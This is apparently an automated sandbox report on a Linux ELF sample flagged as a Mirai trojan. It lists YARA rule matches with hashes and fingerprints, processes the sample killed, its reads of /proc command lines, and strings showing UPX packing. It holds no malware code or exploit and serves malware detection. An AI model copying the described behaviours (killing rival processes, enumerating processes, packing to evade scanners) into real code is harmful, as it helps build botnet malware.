      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_c8385b81 Author: unknown
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_70ef58f1 Author: unknown
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a85a418 Author: unknown
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_485c4b13 Author: unknown
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_7d05725e Author: unknown
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_2e3f67a9 Author: unknown
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0d73971c Author: unknown
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_268aac0b Author: unknown
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0cb1699c Author: unknown
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_c8385b81 Author: unknown
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_70ef58f1 Author: unknown
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a85a418 Author: unknown
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_485c4b13 Author: unknown
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_7d05725e Author: unknown
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_2e3f67a9 Author: unknown
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0d73971c Author: unknown
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2018, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2077, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2078, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2079, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2080, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2083, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2084, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2156, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6239, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6240, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6241, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6242, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6243, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6244, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6252, result: successfulJump to behavior
      Source: LOAD without section mappingsProgram segment: 0x8048000
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2018, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2077, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2078, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2079, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2080, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2083, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2084, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 2156, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6239, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6240, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6241, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6242, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6243, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6244, result: successfulJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)SIGKILL sent: pid: 6252, result: successfulJump to behavior
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_268aac0b reference_sample = 49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 9c581721bf82af7dc6482a2c41af5fb3404e01c82545c7b2b29230f707014781, id = 268aac0b-c5c7-4035-8381-4e182de91e32, last_modified = 2021-09-16
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0cb1699c reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6e44c68bba8c9fb53ac85080b9ad765579f027cabfea5055a0bb3a85b8671089, id = 0cb1699c-9a08-4885-aa7f-0f1ee2543cac, last_modified = 2021-09-16
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_c8385b81 reference_sample = 3d27736caccdd3199a14ce29d91b1812d1d597a4fa8472698e6df6ef716f5ce9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = dfdbd4dbfe16bcf779adb16352d5e57e3950e449e96c10bf33a91efee7c085e5, id = c8385b81-0f5b-41c3-94bb-265ede946a84, last_modified = 2021-09-16
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_70ef58f1 reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c46eac9185e5f396456004d1e0c42b54a9318e0450f797c55703122cfb8fea89, id = 70ef58f1-ac74-4e33-ae03-e68d1d5a4379, last_modified = 2021-09-16
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a85a418 reference_sample = 86a43b39b157f47ab12e9dc1013b4eec0e1792092d4cef2772a21a9bf4fc518a, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 554aff5770bfe8fdeae94f5f5a0fd7f7786340a95633433d8e686af1c25b8cec, id = 3a85a418-2bd9-445a-86cb-657ca7edf566, last_modified = 2021-09-16
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_485c4b13 reference_sample = 49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 28f3e8982cee2836a59721c88ee0a9159ad6fdfc27c0091927f5286f3a731e9a, id = 485c4b13-3c7c-47a7-b926-8237cb759ad7, last_modified = 2021-09-16
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_7d05725e reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7fcd34cb7c37836a1fa8eb9375a80da01bda0e98c568422255d83c840acc0714, id = 7d05725e-db59-42a7-99aa-99de79728126, last_modified = 2021-09-16
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_2e3f67a9 reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6a06815f3d2e5f1a7a67f4264953dbb2e9d14e5f3486b178da845eab5b922d4f, id = 2e3f67a9-6fd5-4457-a626-3a9015bdb401, last_modified = 2021-09-16
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0d73971c reference_sample = 49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 95279bc45936ca867efb30040354c8ff81de31dccda051cfd40b4fb268c228c5, id = 0d73971c-4253-4e7d-b1e1-20b031197f9e, last_modified = 2021-09-16
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_268aac0b reference_sample = 49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 9c581721bf82af7dc6482a2c41af5fb3404e01c82545c7b2b29230f707014781, id = 268aac0b-c5c7-4035-8381-4e182de91e32, last_modified = 2021-09-16
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0cb1699c reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6e44c68bba8c9fb53ac85080b9ad765579f027cabfea5055a0bb3a85b8671089, id = 0cb1699c-9a08-4885-aa7f-0f1ee2543cac, last_modified = 2021-09-16
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_c8385b81 reference_sample = 3d27736caccdd3199a14ce29d91b1812d1d597a4fa8472698e6df6ef716f5ce9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = dfdbd4dbfe16bcf779adb16352d5e57e3950e449e96c10bf33a91efee7c085e5, id = c8385b81-0f5b-41c3-94bb-265ede946a84, last_modified = 2021-09-16
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_70ef58f1 reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c46eac9185e5f396456004d1e0c42b54a9318e0450f797c55703122cfb8fea89, id = 70ef58f1-ac74-4e33-ae03-e68d1d5a4379, last_modified = 2021-09-16
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a85a418 reference_sample = 86a43b39b157f47ab12e9dc1013b4eec0e1792092d4cef2772a21a9bf4fc518a, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 554aff5770bfe8fdeae94f5f5a0fd7f7786340a95633433d8e686af1c25b8cec, id = 3a85a418-2bd9-445a-86cb-657ca7edf566, last_modified = 2021-09-16
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_485c4b13 reference_sample = 49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 28f3e8982cee2836a59721c88ee0a9159ad6fdfc27c0091927f5286f3a731e9a, id = 485c4b13-3c7c-47a7-b926-8237cb759ad7, last_modified = 2021-09-16
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_7d05725e reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7fcd34cb7c37836a1fa8eb9375a80da01bda0e98c568422255d83c840acc0714, id = 7d05725e-db59-42a7-99aa-99de79728126, last_modified = 2021-09-16
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_2e3f67a9 reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6a06815f3d2e5f1a7a67f4264953dbb2e9d14e5f3486b178da845eab5b922d4f, id = 2e3f67a9-6fd5-4457-a626-3a9015bdb401, last_modified = 2021-09-16
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0d73971c reference_sample = 49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 95279bc45936ca867efb30040354c8ff81de31dccda051cfd40b4fb268c228c5, id = 0d73971c-4253-4e7d-b1e1-20b031197f9e, last_modified = 2021-09-16
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: 6229.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
      Source: classification engineClassification label: mal100.spre.troj.evad.linELF@0/0@0/0

      Data Obfuscation

      barindex
      Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
      Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
      Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6243)Directory: /home/saturnino/.cacheJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6243)Directory: /home/saturnino/.localJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6243)Directory: /home/saturnino/.configJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 6252)Directory: /home/saturnino/.cacheJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 6252)Directory: /home/saturnino/.localJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 6252)Directory: /home/saturnino/.configJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd (PID: 6252)Directory: /home/saturnino/.configJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/6232/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/6233/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/6235/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1582/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2033/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2275/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/3088/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1612/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1579/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1699/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1335/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1698/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2028/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1334/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1576/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2302/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/3236/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2025/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2146/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/910/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/4444/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/4445/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/912/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/4446/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/517/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/759/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/4447/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2307/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/918/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/6241/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/6240/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/6243/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/6242/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/6244/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1594/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2285/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2281/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1349/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1623/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/761/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1622/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/884/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1983/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2038/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1344/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1465/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1586/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1860/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1463/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2156/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/800/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/801/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1629/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/6239/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1627/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1900/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/6252/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/3021/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/491/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2294/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2050/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1877/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/772/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1633/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1599/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1632/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/774/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1477/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/654/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/896/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1476/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1872/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2048/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/655/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1475/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/2289/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/656/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/777/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/657/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/658/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/4500/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/4502/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/419/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/936/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1639/cmdlineJump to behavior
      Source: /tmp/Cm1FNv3k5V.elf (PID: 6236)File opened: /proc/1638/cmdlineJump to behavior
